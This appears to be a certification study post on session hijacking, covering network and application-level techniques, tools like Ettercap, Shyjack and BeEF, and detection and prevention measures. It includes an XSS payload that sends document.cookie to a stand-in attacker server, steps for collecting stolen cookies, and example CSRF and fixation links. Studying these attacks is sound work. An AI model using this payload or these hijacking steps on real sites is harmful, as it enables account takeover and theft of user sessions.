CEHv12-11 - Network and Perimeter Hacking - Session Hijacking

In Security

Concepts

Session hijacking is a type of cyberattack where an attacker takes control of a legitimate user’s session on a computer system, network, or application. The attacker intercepts or steals the session identifier (e.g., session cookie or token) to impersonate the victim and gain unauthorized access to the system or application. In brief, it is impersonation of an authenticated user.

Types:
- Passive Session Hijacking: the attacker eavesdrops on the communication between the client and server to capture session identifiers without actively interfering with the traffic. The attacker aims to intercept sensitive information transmitted during the session, such as authentication credentials or session tokens, without alerting the victim or raising suspicion. (e.g. attacker uses a network sniffer tool to capture packets exchanged between a user’s web browser and a banking website. By analyzing the captured traffic, the attacker identifies the session cookie used for authentication. The attacker can then use this session cookie to impersonate the user and gain unauthorized access to the banking website without the user’s knowledge).
- Active Session Hijacking: the attacker actively interferes with the communication between the client and server to intercept or manipulate session identifiers. Unlike passive session hijacking, the attacker modifies network traffic or injects malicious code to steal session tokens or manipulate session-related data (e.g. attacker performs a man-in-the-middle (MitM) attack to intercept traffic between a user and an online shopping website. The attacker injects malicious JavaScript code into the web pages served by the website, which steals the user’s session cookie upon execution. With the stolen session cookie, the attacker can impersonate the user and make unauthorized purchases or access sensitive account information).

Network level session hijacking

Network layer session hijacking takes place at the network level of the OSI model. Attackers intercept and manipulate network packets to steal session identifiers or manipulate session-related data, bypassing application-level security controls. This type of hijacking can be more difficult to detect and mitigate compared to application layer hijacking.

Types:
- Blind Hijacking: the attacker attempts to hijack a session without having access to the actual session data. In blind hijacking, the attacker relies on guesswork or brute force techniques to predict or guess session identifiers, such as session cookies or tokens. This can be challenging for the attacker since they lack direct access to the session information and may require extensive trial and error to succeed.
- UDP Hijacking: involves the interception and manipulation of UDP (User Datagram Protocol) packets to hijack a session between a client and server. Unlike TCP, UDP is connectionless and does not include mechanisms for session establishment or maintenance. As a result, UDP hijacking attacks typically target applications or services that use UDP for communication, such as online gaming or VoIP (Voice over Internet Protocol) applications. Attackers may inject or modify UDP packets to disrupt communication, inject malicious payloads, or hijack sessions between the client and server.
- RST Hijacking: hijacks TCP sessions by sending forged TCP RST (Reset) packets to terminate established connections between a client and server. TCP RST packets are used to signal the abrupt termination of a TCP connection, and they can be abused by attackers to forcibly close connections between legitimate parties. By spoofing or injecting TCP RST packets into the network traffic, the attacker can disrupt ongoing sessions, terminate connections prematurely, or manipulate the flow of data between the client and server. RST hijacking attacks can be effective in disrupting communication and causing denial-of-service (DoS) conditions for targeted services or applications.
- TCP Session Hijacking: manipulates or takes over an active TCP session by spoofing the connection and injecting malicious traffic. Example process:
  1. Set up a Telnet session: establish a Telnet session between a client and server (e.g., Metasploitable server).
  2. Use ARP poisoning: deploy Ettercap for ARP poisoning to redirect traffic. Identify target devices and place yourself in the middle of their communication.
  3. Sniff traffic with Wireshark: capture IPs, ports, and data exchanges. Analyze TCP streams for critical details like source and destination.
  4. Hijack the Session: use Shyjack to hijack the session.
    - Provide source IP, destination IP, and port details.
    - Inject commands to control the session (e.g., file creation or directory listing).
  5. Verification: Observe changes on the target system to confirm hijack success.
- Session Token Hijacking: captures session tokens from HTTP traffic and reuses them to impersonate a user. Example process:
  1. Capture HTTP traffic: use tools like Wireshark to sniff HTTP packets.
  2. Extract the session token: identify and copy session cookies or tokens from the captured traffic.
  3. Inject the token: use browser developer tools to replace the session token. Validate by navigating the target’s session with their permissions.
Key Concepts:
- Man-in-the-Middle (MITM): most session hijacking techniques depend on intercepting communication between the victim and the server.
- Connection-oriented vs. Connectionless:
  - TCP hijacking relies on exploiting sequence numbers in a connection-oriented protocol.
  - UDP hijacking leverages the stateless nature of UDP for easier injection.
Network Analysis: tools like Wireshark help visualize and extract session details.
Best practices for defenders:
- Use encryption (e.g., HTTPS) to protect session tokens.
- Implement robust sequence number randomization.
- Monitor for unusual traffic patterns or ARP poisoning attempts.
- Regularly update and patch network tools and devices.

Application-level session hijacking

Application-level session hijacking involves exploiting vulnerabilities in web applications to intercept, manipulate, or predict session data. Attackers use various techniques to impersonate legitimate users, gaining unauthorized access to sensitive information or actions.

An attacker may exploit vulnerabilities in web applications or software to steal session identifiers or manipulate session-related data. By targeting weaknesses in the application logic or implementation, the attacker can gain unauthorized access to user accounts, manipulate transactions, or extract sensitive information.

Common attacks:
1. Sniffing passively monitors network traffic to capture session IDs, tokens, or cookies.
  - Process:
    1. Use tools like Wireshark to sniff network traffic.
    2. Extract session tokens or cookies from captured packets.
    3. Inject captured tokens into your browser or API client to hijack the session.
  - Notes: effective on unsecured networks or during VLAN hopping. Passive until tokens are actively used.
2. Man-in-the-Middle (MITM): actively intercepts and manipulates communication between a user and a server.
  - Variant: Man-in-the-Browser: a malware-based MITM attack using tools like BeEF (Browser Exploitation Framework.
    - Hooks browsers via cross-site scripting (XSS) or direct injection.
    - Allows full control over browser actions, including stealing cookies or performing actions on behalf of the victim.
3. Cross-Site Scripting (XSS): injects malicious scripts into web applications to exploit user sessions.
  - Process:
    1. Identify a vulnerable input in the web application (e.g., stored XSS).
    2. Inject a script to extract session cookies or tokens. An example of payload is:
      1
      2
      3
      <script>
      new Image().src="http://attacker-server:8000/steal.php?cookie=" + document.cookie;
      </script>
    3. Set up an HTTP server (e.g., Python) to capture requests with stolen session cookies.
    4. Use captured cookies to hijack the session.
  - Variations:
    - Stored XSS: Targets multiple users accessing a page.
    - Reflected XSS: Requires user interaction (e.g., phishing links).
4. Compression Ratio Info Leak Made Easy (CRIME): exploits vulnerabilities in SSL/TLS compression (SPDY) to reveal encrypted information (e.g. dedice context of the session cookie from differences on file sizes).
  - Attacks leverage patterns in compressed data to infer sensitive information.
  - Largely mitigated by modern patches.
5. Session fixation forces a victim to use a specific session ID controlled by the attacker.
  - Process:
    1. The attacker generates a valid session ID.
    2. Delivers the session ID to the victim through phishing or crafted links.
    3. Once the victim logs in, the attacker uses the known session ID to access the session (e.g. URL: https://example.com?sessionid=12345).
6. Session donation: similar to fixation, but the attacker donates their session ID to the victim.
  - Process:
    1. The attacker logs in to create a session ID.
    2. Sends the session ID to the victim.
    3. The attacker uses the session ID to monitor or manipulate the session.
7. Cross-Site Request Forgery (CSRF): exploits a user’s authenticated session to perform unauthorized actions (banking transfer).
  - Process:
    1. Create a malicious link triggering a password reset or fund transfer (e.g. https://example.com/resetpassword?newpassword=AttackerPassword123).
    2. Send the link to the victim.
    3. Once clicked, the action is executed under the victim’s session.
8. Session ID prediction: predicts or brute-forces session IDs to hijack a session (use sequences and patterns).
  - Process:
    1. Analyze patterns in session ID generation (e.g., sequential numbers like current Session ID: sess123).
    2. Test predicted session IDs to see if they match active sessions (eg.sess122 or sess124).
Mitigation Strategies
- Encryption: use HTTPS to secure data in transit.
- Secure cookies:
  - Mark cookies as HttpOnly and Secure.
  - Implement SameSite attributes.
- Session Management:
  - Regenerate session IDs upon login.
  - Expire sessions after a period of inactivity.
- Input Validation: sanitize user inputs to prevent XSS and CSRF.
- CSRF Tokens: use unique tokens to validate requests.

Countermeasures

Detection strategies:
- Manual detection
  - Monitor network traffic: establish baselines for normal traffic levels, and identify unusual spikes or patterns indicating potential attacks (e.g., session hijacking, denial-of-service attacks).
  - Inspect packet data: use tools like Wireshark to examine packets for anomalies, such as unexpected tokens or unusual source/destination combinations.
  - Check ARP cache entries: look for duplicate entries, which may signal ARP poisoning and a potential man-in-the-middle attack.
- Automated detection:
  - Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): use to identify suspicious behavior and block attacks in real time.
  - Security Information and Event Management (SIEM): implement solutions with real-time threat detection and analysis.
  - Web Application Firewalls (WAFs): block malicious traffic targeting web applications.
Preventative Measures:
- For End Users:
  1. Use encrypted connections: always prefer HTTPS over HTTP.
  2. Log out after use: avoid leaving sessions open to minimize the risk of session hijacking.
  3. Avoid clicking suspicious links:verify the legitimacy of links before clicking, especially in emails or messages.
  4. Maintain security hygiene: egularly update software and browsers. Use strong, unique passwords and enable two-factor authentication (2FA) where possible.
- For Web application developers and admins:
  1. Session Management:
    - Randomize session IDs to prevent ID prediction.
    - Regenerate session IDs upon user login to invalidate old ones.
    - Avoid assigning session tokens to unauthenticated users.
  2. Encrypt Data:
    - Implement TLS for secure communication.
    - Use IPsec for encrypting network-level communications.
  3. Session Expiry:
    - Automatically log users out after periods of inactivity.
    - Implement short expiration times for session tokens.
  4. Validate Requests:
    - Ensure sessions originate from the same host by validating Source IP, User-Agent string and referrer headers.
    - Use geolocation checks to flag unexpected access patterns.
  5. Implement Security Headers: use HttpOnly, Secure, and SameSite attributes for cookies.
  6. Defend against session fixation: ensure that session IDs change after user authentication, and avoid embedding session tokens in URLs.